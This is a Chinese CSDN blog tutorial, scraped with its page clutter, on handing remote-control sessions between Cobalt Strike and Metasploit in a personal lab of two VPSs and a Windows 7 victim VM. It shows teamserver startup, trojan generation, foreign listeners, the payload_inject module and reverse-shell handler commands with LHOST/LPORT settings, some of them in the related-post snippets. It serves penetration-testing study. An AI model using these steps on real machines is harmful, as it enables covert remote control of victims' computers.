细说——CS联动MSF

最新推荐文章于 2024-05-21 20:05:31 发布
最新推荐文章于 2024-05-21 20:05:31 发布
阅读量5.4k 收藏 30
点赞数 8
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44288604/article/details/119456115
版权

目录


网上的文章,写的很简洁,看的脑壳疼,自己动手,详实的记录一下学习过程

环境准备

我使用两台vps,一台是kali 52.69.164.3,一台是ubuntu 52.194.218.196​
kali使用msf,ubuntu使用cs服务器,物理机使用cs客户端,虚拟机win7是受害者
在这里插入图片描述

CS ——> MSF

简单来说,就是当cs拿到一台主机之后,新增一个用于转发会话的监听器,指明接收者的 ip 和端口,然后把上线主机委派出去即可

ubuntu准备

  1. 安装java
sudo apt-get install openjdk-8-jdk  # 安装java环境(vps没有java环境)
  1. 上传cs
  2. 启动CS服务器
unzip cs.zip	# 解压
sudo chmod +x teamserver
sudo ./teamserver 云主机ip CS服务器密码

在这里插入图片描述

cs客户机器准备

双击start.bat就行了
在这里插入图片描述

  1. 创建监听器
    在这里插入图片描述
  2. 生成木马
    在这里插入图片描述
  3. 木马移动到虚拟机中执行,cs上线
  4. 添加一个新的监听器,用来传递给msf

由于生成的木马就是HTTP的,所以委派给msf时,监听器还是HTTP的
在这里插入图片描述

  1. 委派会话
    在这里插入图片描述

msf准备

在这里插入图片描述
上线
在这里插入图片描述

补充

实际操作的时候,上线很烦人,就是不知道为什么,死活上不了线
我后来反复检查vps入站出站的规则无误,后来是重新修改了监听端口才好
在这里插入图片描述

MSF ——> CS

把msf上的会话传递给cs。
简单来说,就是msf在拿到session之后,使用exploit/windows/local/payload_inject模块来指明接收者的 ip 和端口,然后把session委派出去。

MSF准备

我这里使用的是上面cs传给msf的会话,所以,设置msf的payload的时候,要跟之前的保持一致。

  1. 查看当前有哪些session,选择一个
  2. 选择委派session的模块
use exploit/windows/local/payload_inject

  1. 设置payload等相关信息
    在这里插入图片描述

  2. 填写完毕即可发起攻击

lport写的是cs监听端口
lhost写的是cs主机ip
在这里插入图片描述

ubuntu-cs准备

其实就是设置一个监听器,等着别人连接就好。由于前面做实验 cs ——> msf 的时候,cs是有监听器的,那就用现成的了。所以,当msf发起攻击的时候,cs就会上线

  1. 使用的监听器
    在这里插入图片描述
  2. 上线成功
    在这里插入图片描述

lainwith
关注
  • 8
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CSMSF联动/shell互相反弹
qq_59468567的博客
04-12 322
set DisablePayloadHandler true #默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于已经有了一个不需要再产生一个,所以这里设置为true。set payload windows/meterpreter/reverse_http #两边的payload协议一定要对应的。先建立一个监听器,和msf的要一一对应,上面的ip必须是可以ping通的大部分情况是外网ip。此处标红的对应下面的两个,取决加不加。然后返回前面的增加会话。
msf联动cs
hmysn的博客
12-31 2104
Cobalt Strike简称CS 用于团队作战使用,由一个服务端和多个客户端组成,能让多个攻击者这在一个团队服务器上共享目标资源和信息,我们在使用msf获得权限以后,可以将信息共享到cs上,使用cs来进行监听以及其他的操作。
CS会话传递给MSF
最新发布
m0_64868272的博客
05-21 406
需要注意的是这里我们要填运行msf的主机地址,端口名字随意。这样如果顺利的话,msf就拿到cs的session了。用刚刚的设置的监听器
CS联动MSF
m0_72125469的博客
05-27 557
cobalt strike(简称CS)及Metasploit(简称msf)各有所长,cs更适合作为稳控平台,msf更适用于与各类内网信息搜集及漏洞利用。为了取长补短,我们进行联动
msfcs联动
bring_coco的博客
05-18 1967
环境:kali(192.168.190.128)NATAPP。
MSFCS联动
GoDunTong's Blog
04-08 4130
转载自Snowming04’s Blog 0x01 准备工作 受害主机:在关闭 Windows Defender 和其他一切杀软的前提下,在 Win 10 主机下进行的实验。 MSF:本地 kali Cobalt Strike 团队服务器:Ubuntu VPS Cobalt Strike:3.14 团队服务器: 客户端: 上线过程: 因为我关闭了一切杀软及 Windows Defender,自不必做免杀。 一些朋友搞不清楚 Windows Executable 和 Windows Exec.
CS + MSF 联动
A_dmin的博客
12-23 1544
CS + MSF 联动 首先cs上已经成功上线: Kali查看IP地址: Msf上操作: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.198.128 set lport 7777 exploit -j #-j 后台监听(ps:这里手抖少打了一个7) 如果msf处于公网,cs添加监听器Listener,HOST和PORT填写msf监听的地址IP:xxxx,PORT:7777
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
M个案研究——微软如何使用MSF做软件开发学习教案.pptx
12-27
微软如何使用MSF做软件开发学习教案 本资源是微软的一份案研究,介绍了微软如何使用MSF(Microsoft Solutions Framework)做软件开发学习教案。该案研究共43页,涵盖了SharePoint Team Services产品的开发过程、...
解读MSF团队管理的秘密
03-03
火龙果软件工程技术中心 俗话说“三个臭皮匠胜过诸葛亮”,但实际工作中出现的常常是“三个诸葛亮不如一个臭皮匠”。您的软件开发团队有这样的一些问题吗?日程安排一团糟、功能不合适、到处都是系统错误,而原因...
MSF技术总结
05-07
MSF 技术总结 MSF(Metasploit Framework)是一款功能强大且广泛使用的渗透测试工具,提供了丰富的命令和插件,帮助渗透测试者快速发现和利用系统漏洞。本文将对 MSF 的使用和高级用法进行总结。 一、MSF 架构 ...
2021-06-30csmsf联动派生会话shell
qq_45290991的博客
06-30 622
一、当cs获取到会话后反弹给msf 1、msf上操作 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.52.208 set lport 7777 exploit -j #-j 后台监听 12345 2、...
Cobalt Strike与MSF联动
weixin_42035825的博客
03-29 2862
cs的会话---->msf的会话 注意:必须安装java 我这里使用的是cs4.0版本的,所以后面的有些东西会和以前的有些差异,但并不影响。 进入目录,启动cs的服务端,命令格式:./teamserver ip 密码; 客户端有两种一种是windows版,一种是linux版。这里采用linux版本,但都必须是在java环境里面; 启动客户端: host:服务器端的ip; port:服务器...
内网安全:NTLM-Relay
qq_61553520的博客
01-28 1607
有NTLM Hash,直接PTH;没有NTLM Hash,尝试抓取Net NTLM Hash,暴力破解明文密码,中继攻击。
内网安全-代理Socks协议&CS-MSF控制上线
m0_65336233的博客
12-19 1839
内网安全-代理Socks协议&路由不出网&后渗透通讯&CS-MSF控制上线
Cobalt Strike(cs联动 msf
weixin_46079186的博客
11-18 3203
真实渗透场景 靶机:win2008 ip:218.77.102.x vps(cs 服务端 和 安装了msf):centos7 ip:45.76.151.x 本地(cs 客户端,连接cs ): 本地已经连接cs 并且已经上线、我们只需要连接到msf 添加监听器 点击add 添加 payload 设置为Foreign HTTP,ip 为vps 主机,设置端口 点击seav 3. 添加成功后如图 4. vps 打开msf, use exploit/multi/handler set pay
MSF恶意程序利用——CS上线
陳Huid的博客
08-07 634
申明:本篇文章的用意仅做学习使用!
CS\MSF进阶-拓展应用
weixin_51151498的博客
06-14 286
渗透框架
msf脚本
05-24
MSF(Metasploit Framework)是一个开源的安全漏洞检测和攻击的工具包,它可以帮助安全研究人员和渗透测试人员进行漏洞探测、漏洞利用和后渗透测试等多种操作。MSF中的脚本是一种自动化的攻击工具,可以快速地执行特定的攻击或者扫描操作。 MSF中的脚本通常使用Ruby语言编写,脚本文件的后缀名为.rb。使用MSF中的脚本需要掌握一定的Ruby编程知识和MSF框架的使用方法。下面是一个简单的MSF脚本示例: ```ruby require 'msf/core' class MyModule < Msf::Auxiliary def initialize super( 'Name' => 'My Module', 'Description' => 'This is my module', 'Author' => 'Me', 'License' => MSF_LICENSE ) register_options([ OptString.new('TARGETHOST', [true, 'The target host', '']), OptPort.new('TARGETPORT', [true, 'The target port', 80]) ]) end def run target_host = datastore['TARGETHOST'] target_port = datastore['TARGETPORT'] # Do some stuff here end end ``` 这个脚本定义了一个名为"My Module"的模块,它需要用户输入目标主机的IP地址和端口号,并在run方法中实现一些攻击或扫描的操作。在使用MSF时,可以通过load命令加载该脚本,并在MSF的命令行界面中执行该模块。 需要注意的是,MSF是一个强大的攻击工具,使用不当可能会对他人造成损害,请务必遵守相关法律法规和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值